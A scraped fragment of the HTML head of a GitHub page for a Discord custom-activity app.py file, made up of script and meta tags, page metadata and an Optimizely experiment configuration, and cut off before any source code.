data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-9ce3fc6c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-rhladi60G4WRCtFkJAErIB32DBQt6BIMuzFRR0wJ68nWcqex4+C5Xb62rsOSNdluP3kuaSyWT3GTLCDSLv5jIA==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-ae195a76.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OoQBKokKMwRbi8BnCiii19MhicXF30O4k4hG7Vjg4xOltzKOC3kmOT0ERg0JBHqWGfjuMRWhuGNEX2EKgxalUw==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-3a84012a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-9XDv6O7Jn1ObhwWefPuUA4owGMOkPsTnvIITKck1CaZH35Sad6L1gq+Vvw8TEeB+gYUgBxWdkl3LgXjVkpDWMQ==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-f570efe8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8EhI56c+WrEr07oNcFy+Q329w5+DQVhB2TO9e0bT/TxnooHtwze/OanZof/+zDJxW7RbYY2pzRVwLRvoJRHUrA==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-f04848e7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fDNA1jZjxFyXNVY10A8BfaZE/vpXhcnOI23xRlVWDJwmLsDsGm+5fedVhSPI9xxWfAVd9x6dFgZ0wzJRhFo3Rw==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-7c3340d6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-bjSP8StMagdENf3/Xy8fkbUePS7vNbw+2hpgg0tne7zm/eiz3b1mM0XthFTSfxhO9QHFD8wO/hOCcbnORvN3NA==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" 
data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-6e348ff1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SBHO7sHXCuNn05KXDWS2ESheFt4K2kHRApzXS5HnFzOcb3d1yP0l44PDzciQdCLs9Bqf5LT5TdSL9X1P3ELwUA==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-4811ceee.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OhOqF8hc26oNrxmRDWKLI5q2fZ981+zlYQnP8NWdQdHVw4/PS458WilKGoU2xaMsoFD7VmzAv0/TEUDbrDLpNA==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-3a13aa17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4QXRinR8LP2zrjFze0MDwuRPeLAojLt0f8KEdUTJdb2YkYLLgYGqolD+6R7ZDq9Z4JN8R7W6l8Ol+Mq1K0o2hg==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-e105d18a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-r43awUBZWgUCEeqtDxYagERDbdN40mKXncMXD3WOB/COTYK83O6LTdXAgSQqR8pzYLutqstdN/O69iL641ka9w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-af8ddac1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-+ghwIHl4WoTIKefFnsS00RF8wYc+3MqK4eEh1Rst68581JyTbm7O1RxzJjjzlXscQC81/zl70xwhc+SjdReoIA==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-fa087020.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-THgJsKACwTri1ETwLTU7myuj4XY4Jp4ZNziTof0Fo6v0iOljLueWxBybgtoOk1xWxa51GupjBc+gOoPGj8TaZA==" type="application/javascript" data-module-id="./chunk-tip.js" 
data-src="https://github.githubassets.com/assets/chunk-tip-4c7809b0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-WK8VXw3lfUQ/VRW0zlgKPhcMUqH0uTnB/KzePUPdZhCm/HpxfXXHKTGvj5C0Oex7+zbIM2ECzULbtTCT4ug3yg==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-58af155f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZunpwBOViRebn/36Tku+7ZX39dPhNTIyKl+mL5t3n4F9JrcHiwYJdApE8OWHcvkzmGuD0f/AlUwzPIrafMHMBw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-66e9e9c0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fvcOOYapCxPkDRQWz2WQzrqL6rRhX88yHWF87fb9Xny2Fq4lri0ONaVFL7XDSTiTyu4OTp+8WoyfMVpgGUaaVg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-7ef70e39.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hXM+wbN4loHepYG9wciuBZIBbZKnyrj1fHNEc2U4FGp4ferKbr4SA/wGyOZUun/W+yw+aHi0R0ZQqgr0YBFhQQ==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-85733ec1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wQnjXBFgueIl3c4MJVGGbqMThHgUcsOVtWP3vsLqqjRdtPae9B/fXj91Ow2UyzOF3b28lFfDi3jCyrJ+0oc/5g==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-c109e35c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-A4qmVMCzB5D2dyHe2jUKlYmeGBxzaGzo+me2FKfRqrKfvAFQqnb8lSH60xmtaAGbaJze3hBMBlA2IlCLCvFwLg==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-038aa654.js"></script> <script crossorigin="anonymous" defer="defer" 
integrity="sha512-VkWgu6DTrdgalvai4dv3kFM+AW4sPKJ0HnXDkTR+ED2YuypnGKavD4cqmX0iwDu1nE46Iax70/mdH5hWKOjSGQ==" type="application/javascript" src="https://github.githubassets.com/assets/diffs-5645a0bb.js"></script> <meta name="viewport" content="width=device-width"> <title>discord-custom-activity/app.py at master · agambajwa/discord-custom-activity</title> <meta name="description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta name="twitter:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta property="og:image:alt" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." 
/><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta property="og:url" content="https://github.com/agambajwa/discord-custom-activity" /><meta property="og:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <link rel="shared-web-socket" href="wss://alive.github.com/_sockets/u/91737103/ws?session=eyJ2IjoiVjMiLCJ1Ijo5MTczNzEwMywicyI6NzYxNzA1MDI2LCJjIjo0MTc3MzU0NDYyLCJ0IjoxNjMzMzQ2MTgxfQ==--39edc59650e83b8d21b49e80f0dc2c8d8b193b66b4ee07dbdcea646522e41c9a" data-refresh-url="/_alive" data-session-id="7f83f766808e89f2c7b35c4840e92fc948d791956ae5c8a102edd36d614a7dd3"> <link rel="shared-web-socket-src" href="/socket-worker-0af8a29d.js"> <link rel="sudo-modal" href="/sessions/sudo_modal"> <meta name="request-id" content="A49F:7859:D3968:14FACD:615AE285" data-pjax-transient="true" /><meta name="html-safe-nonce" content="820993e64658c9849c0e0da6552784777372f6b8c3b5cd1e47564c3857ce68f9" data-pjax-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6Imh0dHBzOi8vZ2l0aHViLmNvbS9hZ2FtYmFqd2EvZGlzY29yZC1jdXN0b20tYWN0aXZpdHkiLCJyZXF1ZXN0X2lkIjoiQTQ5Rjo3ODU5OkQzOTY4OjE0RkFDRDo2MTVBRTI4NSIsInZpc2l0b3JfaWQiOiI2NzQzMDk1MDUyODcxMjcyNDA5IiwicmVnaW9uX2VkZ2UiOiJzb3V0aGVhc3Rhc2lhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="df6cd9ddda4db95524fb9c3c9cc17f8b88a8f25b230bc1e43f92b48812fa8bbd" data-pjax-transient="true" /> <meta name="hovercard-subject-tag" content="repository:298526344" data-pjax-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" 
/> <meta name="selected-link" value="repo_source" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="octolytics-host" content="collector.githubapp.com" /><meta name="octolytics-app-id" content="github" /><meta name="octolytics-event-url" content="https://collector.githubapp.com/github-external/browser_event" /><meta name="octolytics-actor-id" content="91737103" /><meta name="octolytics-actor-login" content="Bomzz06" /><meta name="octolytics-actor-hash" content="768d6322e087f5dd93879e36a05bc5cd2c0b8e677c83f0a6378ea6775b96f44b" /> <meta name="analytics-location" content="/&lt;user-name&gt;/&lt;repo-name&gt;/blob/show" data-pjax-transient="true" /> <meta name="optimizely-datafile" content="{&quot;version&quot;: &quot;4&quot;, &quot;rollouts&quot;: [], &quot;typedAudiences&quot;: [], &quot;anonymizeIP&quot;: true, &quot;projectId&quot;: &quot;16737760170&quot;, &quot;variables&quot;: [], &quot;featureFlags&quot;: [], &quot;experiments&quot;: [{&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20438636352&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20484957397&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20479227424&quot;, &quot;key&quot;: &quot;growth_ghec_onboarding_experience&quot;, &quot;layerId&quot;: &quot;20467848595&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 1000}, {&quot;entityId&quot;: &quot;20438636352&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: 
&quot;20438636352&quot;, &quot;endOfRange&quot;: 6000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 8000}, {&quot;entityId&quot;: &quot;20484957397&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20508232513&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20533742085&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20512531891&quot;, &quot;key&quot;: &quot;growth_pull_request_actions_prompt&quot;, &quot;layerId&quot;: &quot;20529822202&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20533742085&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20508232513&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20543572345&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20510876757&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20518037255&quot;, &quot;key&quot;: &quot;growth_issue_actions_prompt&quot;, &quot;layerId&quot;: &quot;20522524291&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20510876757&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20543572345&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}, {&quot;status&quot;: &quot;Running&quot;, &quot;audienceIds&quot;: [], &quot;variations&quot;: [{&quot;variables&quot;: [], &quot;id&quot;: &quot;20619540113&quot;, &quot;key&quot;: &quot;control&quot;}, {&quot;variables&quot;: [], &quot;id&quot;: &quot;20598530123&quot;, &quot;key&quot;: &quot;treatment&quot;}], &quot;id&quot;: &quot;20619150105&quot;, 
&quot;key&quot;: &quot;dynamic_seats&quot;, &quot;layerId&quot;: &quot;20615170077&quot;, &quot;trafficAllocation&quot;: [{&quot;entityId&quot;: &quot;20598530123&quot;, &quot;endOfRange&quot;: 5000}, {&quot;entityId&quot;: &quot;20619540113&quot;, &quot;endOfRange&quot;: 10000}], &quot;forcedVariations&quot;: {}}], &quot;audiences&quot;: [{&quot;conditions&quot;: &quot;[\&quot;or\&quot;, {\&quot;match\&quot;: \&quot;exact\&quot;, \&quot;name\&quot;: \&quot;$opt_dummy_attribute\&quot;, \&quot;type\&quot;: \&quot;custom_attribute\&quot;, \&quot;value\&quot;: \&quot;$opt_dummy_value\&quot;}]&quot;, &quot;id&quot;: &quot;$opt_dummy_audience&quot;, &quot;name&quot;: &quot;Optimizely-Generated Audience for Backwards Compatibility&quot;}], &quot;groups&quot;: [], &quot;sdkKey&quot;: &quot;WTc6awnGuYDdG98CYRban&quot;, &quot;environmentKey&quot;: &quot;production&quot;, &quot;attributes&quot;: [{&quot;id&quot;: &quot;16822470375&quot;, &quot;key&quot;: &quot;user_id&quot;}, {&quot;id&quot;: &quot;17143601254&quot;, &quot;key&quot;: &quot;spammy&quot;}, {&quot;id&quot;: &quot;18175660309&quot;, &quot;key&quot;: &quot;organization_plan&quot;}, {&quot;id&quot;: &quot;18813001570&quot;, &quot;key&quot;: &quot;is_logged_in&quot;}, {&quot;id&quot;: &quot;19073851829&quot;, &quot;key&quot;: &quot;geo&quot;}, {&quot;id&quot;: &quot;20175462351&quot;, &quot;key&quot;: &quot;requestedCurrency&quot;}], &quot;botFiltering&quot;: false, &quot;accountId&quot;: &quot;16737760170&quot;, &quot;events&quot;: [{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;17911811441&quot;, &quot;key&quot;: &quot;hydro_click.dashboard.teacher_toolbox_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18124116703&quot;, &quot;key&quot;: &quot;submit.organizations.complete_sign_up&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18145892387&quot;, &quot;key&quot;: &quot;no_metric.tracked_outside_of_optimizely&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: 
&quot;18178755568&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.add_repo&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18180553241&quot;, &quot;key&quot;: &quot;submit.repository_imports.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18186103728&quot;, &quot;key&quot;: &quot;click.help.learn_more_about_repository_creation&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18188530140&quot;, &quot;key&quot;: &quot;test_event.do_not_use_in_production&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18191963644&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.transfer_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18195612788&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.import_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18210945499&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.invite_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18211063248&quot;, &quot;key&quot;: &quot;click.empty_org_repo_cta.create_repository&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18215721889&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.update_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18224360785&quot;, &quot;key&quot;: &quot;click.org_onboarding_checklist.dismiss&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18234832286&quot;, &quot;key&quot;: &quot;submit.organization_activation.complete&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18252392383&quot;, &quot;key&quot;: &quot;submit.org_repository.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18257551537&quot;, &quot;key&quot;: &quot;submit.org_member_invitation.create&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18259522260&quot;, &quot;key&quot;: &quot;submit.organization_profile.update&quot;}, {&quot;experimentIds&quot;: [], 
&quot;id&quot;: &quot;18564603625&quot;, &quot;key&quot;: &quot;view.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18568612016&quot;, &quot;key&quot;: &quot;click.classroom_sign_in_click&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18572592540&quot;, &quot;key&quot;: &quot;view.classroom_name&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18574203855&quot;, &quot;key&quot;: &quot;click.classroom_create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18582053415&quot;, &quot;key&quot;: &quot;click.classroom_select_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18589463420&quot;, &quot;key&quot;: &quot;click.classroom_create_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591323364&quot;, &quot;key&quot;: &quot;click.classroom_create_first_classroom&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18591652321&quot;, &quot;key&quot;: &quot;click.classroom_grant_access&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;18607131425&quot;, &quot;key&quot;: &quot;view.classroom_creation&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;, &quot;20619150105&quot;], &quot;id&quot;: &quot;18831680583&quot;, &quot;key&quot;: &quot;upgrade_account_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19064064515&quot;, &quot;key&quot;: &quot;click.signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19075373687&quot;, &quot;key&quot;: &quot;click.view_account_billing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19077355841&quot;, &quot;key&quot;: &quot;click.dismiss_signup_prompt&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19079713938&quot;, &quot;key&quot;: &quot;click.contact_sales&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19120963070&quot;, &quot;key&quot;: &quot;click.compare_account_plans&quot;}, 
{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19151690317&quot;, &quot;key&quot;: &quot;click.upgrade_account_cta&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19424193129&quot;, &quot;key&quot;: &quot;click.open_account_switcher&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19520330825&quot;, &quot;key&quot;: &quot;click.visit_account_profile&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19540970635&quot;, &quot;key&quot;: &quot;click.switch_account_context&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19730198868&quot;, &quot;key&quot;: &quot;submit.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19820830627&quot;, &quot;key&quot;: &quot;click.homepage_signup&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;19988571001&quot;, &quot;key&quot;: &quot;click.create_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20036538294&quot;, &quot;key&quot;: &quot;click.create_organization_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20040653299&quot;, &quot;key&quot;: &quot;click.input_enterprise_trial_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20062030003&quot;, &quot;key&quot;: &quot;click.continue_with_team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20068947153&quot;, &quot;key&quot;: &quot;click.create_organization_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20086636658&quot;, &quot;key&quot;: &quot;click.signup_continue.username&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20091648988&quot;, &quot;key&quot;: &quot;click.signup_continue.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20103637615&quot;, &quot;key&quot;: &quot;click.signup_continue.email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20111574253&quot;, &quot;key&quot;: &quot;click.signup_continue.password&quot;}, 
{&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20120044111&quot;, &quot;key&quot;: &quot;view.pricing_page&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20152062109&quot;, &quot;key&quot;: &quot;submit.create_account&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20165800992&quot;, &quot;key&quot;: &quot;submit.upgrade_payment_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20171520319&quot;, &quot;key&quot;: &quot;submit.create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20222645674&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.discuss_your_needs&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20227443657&quot;, &quot;key&quot;: &quot;submit.verify_primary_user_email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20234607160&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.try_enterprise&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20238175784&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20239847212&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.continue_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20251097193&quot;, &quot;key&quot;: &quot;recommended_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20438619534&quot;, &quot;key&quot;: &quot;click.pricing_calculator.1_member&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20456699683&quot;, &quot;key&quot;: &quot;click.pricing_calculator.15_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20467868331&quot;, &quot;key&quot;: &quot;click.pricing_calculator.10_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20476267432&quot;, &quot;key&quot;: &quot;click.trial_days_remaining&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: 
&quot;20476357660&quot;, &quot;key&quot;: &quot;click.discover_feature&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20479287901&quot;, &quot;key&quot;: &quot;click.pricing_calculator.custom_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20481107083&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_teacher_benefits&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20483089392&quot;, &quot;key&quot;: &quot;click.pricing_calculator.5_members&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20484283944&quot;, &quot;key&quot;: &quot;click.onboarding_task&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20484996281&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_student_benefits&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20486713726&quot;, &quot;key&quot;: &quot;click.onboarding_task_breadcrumb&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20490791319&quot;, &quot;key&quot;: &quot;click.upgrade_to_enterprise&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20491786766&quot;, &quot;key&quot;: &quot;click.talk_to_us&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20494144087&quot;, &quot;key&quot;: &quot;click.dismiss_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20499722759&quot;, &quot;key&quot;: &quot;completed_all_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20500710104&quot;, &quot;key&quot;: &quot;completed_onboarding_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20513160672&quot;, &quot;key&quot;: &quot;click.read_doc&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20516196762&quot;, 
&quot;key&quot;: &quot;actions_enabled&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20518980986&quot;, &quot;key&quot;: &quot;click.dismiss_trial_banner&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20535446721&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.dismiss_prompt&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20557002247&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20595070227&quot;, &quot;key&quot;: &quot;click.pull_request_setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20626600314&quot;, &quot;key&quot;: &quot;click.seats_input&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20642310305&quot;, &quot;key&quot;: &quot;click.decrease_seats_number&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20662990045&quot;, &quot;key&quot;: &quot;click.increase_seats_number&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20679620969&quot;, &quot;key&quot;: &quot;click.public_product_roadmap&quot;}], &quot;revision&quot;: &quot;903&quot;}" /> <!-- To prevent page flashing, the optimizely JS needs to be loaded in the <head> tag before the DOM renders --> <script crossorigin="anonymous" defer="defer" integrity="sha512-0h1v+cT+vo2H4r2RIaHBoqggV4iI4Ah+a66PI4mUxhOkt3B7B/OeCMj80fIAb23CGQDCEYsVduIJfHChKLMFhw==" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-d21d6ff9.js"></script> <meta name="hostname" content="github.com"> <meta name="user-login" content="Bomzz06"> <meta name="expected-hostname" content="github.com"> <meta name="js-proxy-site-detection-payload" 
